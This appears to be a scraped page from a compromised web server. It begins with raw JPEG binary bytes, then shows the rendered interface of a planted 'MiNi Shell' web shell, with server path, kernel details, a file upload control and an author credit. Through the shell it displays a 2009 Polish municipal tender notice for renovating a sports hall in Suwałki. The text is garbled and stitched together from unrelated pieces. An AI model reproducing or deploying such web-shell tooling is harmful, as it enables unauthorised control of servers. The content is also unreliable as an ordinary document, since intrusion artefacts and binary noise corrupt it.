JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090304/48890-N-2009.html

<p class="kh_header"><b>Suwałki: Przebudowa hali sportowej OSIR w Suwałkach wraz z zapleczem i zagospodarowaniem terenu.</b><br>
<b>Numer ogłoszenia: 48890 - 2009; data zamieszczenia: 04.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Suwałki , ul. Mickiewicza 1, 16-400 Suwałki, woj. podlaskie, tel. 087 5628000, faks 087 5628098.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa hali sportowej OSIR w Suwałkach wraz z zapleczem i zagospodarowaniem terenu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  przebudowa hali sportowej OSIR w Suwałkach wraz z zapleczem i zagospodarowaniem terenu. 

2.	Przedmiot zamówienia obejmuje:

2. 1. Roboty budowlane w zakresie:
a/ hala duża - 1475,9m2 powierzchni użytkowej:
- demontaż: istniejących okładzin ścian z płyt drewnopochodnych oraz stalowej   konstrukcji do ich  mocowania, sufitu podwieszanego, urządzeń sportowych, posadzki sportowej, siedzisk trybun i  ich barier,
- wykonanie: sufitu  podwieszonego o właściwościach akustycznych, z płyt ECOPHON SUPER G 1200/600/40 o współczynniku pochłania dźwięku nie mniejszym  niż 0,95 mocowanych w systemie ECOPHON CONECT SUPER G Plus /1A/ schemat M116 i M115,  posadzki sportowej z wierzchnią warstwą użytkową z paneli sportowych drewnianych dębowych spełniająca wszystkie parametry stawiane przez normę DIN 18032:2 oraz posiadającą certyfikat FIBA, nowych siedzisk i nawierzchni trybun,  schodów, nowych barier ochronnych, remont kapitalny pozostałych elementów hali.
- wyposażenie hali w : ściankę wspinaczkową wraz z wyposażeniem szerokości 18m               i wysokości 9m z wydzieloną strefą bulderingową szerokości 6m, dwóch kompletów zestawów do koszykówki podwieszanej posiadających certyfikat FIBA, siatki grodzące z napędem elektrycznym, zasłony z konstrukcją podtrzymującą i napędem elektrycznym,
b/ hala mała - 343,27m2 powierzchni użytkowej:
- demontaż: istniejących okładzin ścian z płyt drewnopochodnych oraz stalowej konstrukcji do ich mocowania, sufitu podwieszanego, urządzeń sportowych, posadzki sportowej,
- sufit podwieszony o właściwościach akustycznych, z płyt ECOPHON SUPER G 1200/600/40o współczynniku pochłania dźwięku nie mniejszym  niż 0,95   mocowanych w systemie ECOPHON CONECT SUPER G Plus /1A/ schemat  M115,nową posadzkę sportową z wierzchnią warstwą użytkową z klepki parkietowej dębowej klasy wzorzysta o wym. 350x400x70x22mm  posiadającą atesty i certyfikaty PZKosz, PZPR, PZPN, remont kapitalny pozostałych elementów.
c/ zaplecze 1105,77m2 powierzchni użytkowej: 
- demontaż: elementów ścian i posadzek, boksów szatniowych z siatki stalowej, poszerzenie otworów drzwiowych,
- wykonanie: wymiany stolarki drzwiowej, nowych posadzek  i okładzin ścian, szpachlowanie i malowanie pomieszczeń.
d/ hol dla publiczności - 585,37m2 powierzchni użytkowej: 
- demontaż: istniejącego wystroju,  posadzek, elementów ścian, balustrad i poręczy, 
- wykonanie: nowego wystroju  wnętrz poprzez remont kapitalny poszczególnych pomieszczeń m.in. z   wymianą okładzin ścian i podłóg, wykonaniem wielopoziomowego sufitu podwieszanego, szpachlowanie i malowanie pomieszczeń, montaż nowych barier i balustrad.

2.2. Roboty sanitarne w zakresie:
a/ wykonanie instalacji wentylacji w hali dużej i małej,
b/ remont kapitalny instalacji co w hali małej z zapleczem i hali dużej,
c/ remont kapitalny instalacji kanalizacyjnej w hali małej z zapleczem,
d/ wykonanie instalacji wodociągowej i p-poż w hali dużej i małej,

2.3. Roboty elektryczne w zakresie:
a/ holl wejściowy - wymiana istniejącej instalacji elektrycznej na nową, w tym opraw oświetleniowych 115 szt.
b/ sala duża -  wymiana istniejącej instalacji elektrycznej na nową, w tym opraw oświetleniowych 197 szt.
c/ sala sportowa mała - - wymiana istniejącej instalacji elektrycznej na nową, w tym opraw oświetleniowych 166 szt.

2.4. Roboty drogowe i zagospodarowanie terenu w zakresie:
a/ remont kapitalny istniejących nawierzchni asfaltowych wokół budynku hali sportowej z wydzieleniem nawierzchni dojazdów i placów manewrowych oraz parkingów, z nawierzchni  polbruk gr 8 cm,
b/ wykonanie nowych chodników z kostki betonowej polbruk gr. 6 cm, 
c/ założenie nowych trawników, renowacja starych trawników i zieleni w obrębie realizowanej  Inwestycji.

3. Szczegółowy zakres robót zawierają załączone przedmiary robót, szczegółowe specyfikacje techniczne, dokumentacja projektowa.

4. Przedmiot zamówienia należy wykonać z zastosowaniem materiałów i urządzeń określonych w dokumentacji technicznej. Użyte w dokumentacji projektowej i przedmiarach robót nazwy wyrobów i elementów, które wskazują lub mogłyby kojarzyć się z producentem lub firmą nie mają na celu preferowania wyrobu lub materiałów danego producenta lub wskazanie na wyrób, materiał lub element, który powinien posiadać cechy - parametry techniczne nie gorsze od podanego w projekcie.
		Zamawiający dopuszcza składanie ofert równoważnych z zastosowaniem innych materiałów i urządzeń niż opisane znakiem towarowym i/lub nazwą producenta pod warunkiem, że zagwarantują one uzyskanie parametrów technicznych i eksploatacyjnych nie gorszych od złożonych w dokumentacji.
		Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany wykazać, że oferowane przez niego materiały, urządzenia i roboty budowlane spełniają określone przez Zamawiającego.
		Ciężar udowodnienia, że materiał (wyrób) jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę.
		W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty, opisujące parametry techniczno - jakościowe, wymagane prawem certyfikaty i inne dokumenty, dopuszczające dane materiały (wyroby) do użytkowania oraz pozwalające jednoznacznie stwierdzić, że są one równoważne (pod rygorem odrzucenia oferty).

5. W harmonogramie rzeczowo finansowym robót wykonawca zobowiązany jest uwzględnić  następujące potrzeby zamawiającego:

-  wykonanie przebudowy hali dużej i holu wejściowego w terminie do 30.11.2009 r, w zakresie umożliwiającym uzyskanie częściowego pozwolenia na użytkowanie;
-    zamawiający udostępni do przebudowy w pierwszej kolejności halę dużą i hol wejściowy, a następnie stosownie do postępu robót pozostałą część budynku, stąd wykonawca zobowiązany będzie prowadzić roboty w ścisłym porozumieniu z Dyrektorem Ośrodka Sportu i Rekreacji w Suwałkach, przy zachowaniu zasad obowiązujących przy prowadzeniu  robót w czynnym obiekcie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.25-9, 45.11.12.91-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca zapewni jako część swojej oferty wadium w wysokości: 50.000,00 zł (słownie złotych: pięćdziesiąt   tysięcy złotych) na całość zamówienia.

2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
1.	pieniądzu;
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.	gwarancjach bankowych;
4.	gwarancjach ubezpieczeniowych;
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 r Nr 42 poz.275).

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Miejskiej Dyrekcji Inwestycji w Suwałkach w Banku PKO SA O/Białystok nr 82 1240 5211 1111 0000 4921 9731 w terminie do dnia  25.03.2009 r. do godz. 10:00 (decyduje data wpływu środków na rachunek zamawiającego). Kserokopię dowodu wniesienia wadium należy złożyć w ofercie. 
Wadium w pozostałych formach - oryginały - muszą być wniesione w sekretariacie (pokój 115) Miejskiej Dyrekcji Inwestycji w Suwałkach, ul. Sejneńska 82.
Oznacza to, że w terminie wniesienia wadium, w sekretariacie MDI muszą zostać złożone ww. formy wadium. Wykonawca - dla celów dowodowych - powinien uzyskać dla siebie potwierdzenie złożenia wadium w Sekretariacie MDI.
3.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
4. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących  po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:

1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,

2.	posiadają niezbędną wiedzę i doświadczenie tj.  wykonali z należytą starannością w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną polegającą na budowie lub przebudowie  obiektu użyteczności publicznej o wartości nie mniejszej niż 5.000.000,00 zł brutto,

3.	dysponują lub będą dysponować  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj: kierownicy robót muszą posiadać  co najmniej 5 - letnie doświadczenie zawodowe na podobnym stanowisku oraz uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń zgodnie z wymogami ustawy Prawo budowlane z dnia 7 lipca 1994 r (tj. Dz. U. z 2006 r, Nr 156, poz. 1118 z późn. zm.) lub odpowiadającymi im uprawnieniami nadanymi na podstawie wcześniej obowiązujących przepisów w specjalnościach:

a)	konstrukcyjno - budowlanej,
b)	instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych,
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych  i kanalizacyjnych,

4.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj:

a)	posiadają środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż  1.000.000,00 zł,
b)	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 500.000,00 zł,

5.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ust. 1 i 2 Ustawy Pzp,

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia.
Na potwierdzenie spełnienia w.w. warunków Zamawiający wymaga złożenia przez Wykonawców pisemnych oświadczeń i dokumentów określonych w rozdziale 10 SIWZ.
Niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oryginał lub poświadczona przez Wykonawcę za zgodność z oryginałem kopia aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

2.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca  nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem,

3.	Aktualna(-e) informacja(-e) z Krajowego Rejestru Karnego albo równoważne zaświadczenie(-a) właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem,

4.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Prawo zamówień publicznych - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem,

5.	Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy - Prawo zamówień publicznych - Wykonawca składa oświadczenia, których wzór stanowi załącznik nr 3 i załącznik nr 4,

6.	Wykaz wykonanych  w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną polegającą na budowie lub przebudowie  obiektu użyteczności publicznej o wartości nie mniejszej niż. 5.000.000,00 zł brutto                    z załączeniem dokumentów potwierdzających, że roboty zostały wykonane z należytą starannością na załączniku nr 5.

7.	Wykaz kadry kierowniczej, która będzie uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności w przedmiotowym zamówieniu na załączniku nr 6.
      Kierownicy robót muszą posiadać 5 letnie doświadczenie zawodowe na podobnym stanowisku oraz uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń zgodnie z wymogami ustawy Prawo budowlane z dnia 7 lipca 1994 r (tj. Dz. U. z 2006 r, Nr 156, poz. 1118 z późn. zm.) lub odpowiadającymi im uprawnieniami nadanymi na podstawie wcześniej obowiązujących przepisów w specjalnościach:

a)	konstrukcyjno - budowlanej,
b)	instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych,
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych  i kanalizacyjnych,
      
Wraz  uprawnieniami budowlanymi należy dołączyć  zaświadczenia o przynależności do właściwej izby samorządu zawodowego aktualną na dzień składania ofert w formie kserokopii potwierdzonej za zgodność z oryginałem.

8.	Informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejszą niż 1.000.000,00 zł wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

9.	Oryginał lub poświadczona przez Wykonawcę za zgodność z oryginałami kopia polisy lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 500.000,00 zł,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mdi.suwalki.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejska Dyrekcja Inwestycji 
16-400 Suwałki
ul. Sejneńska 82.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2009 godzina 10:00, miejsce: Miejska Dyrekcja Inwestycji
ul. Sejneńska 82
16-400 Suwałki
pokój nr 115, SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com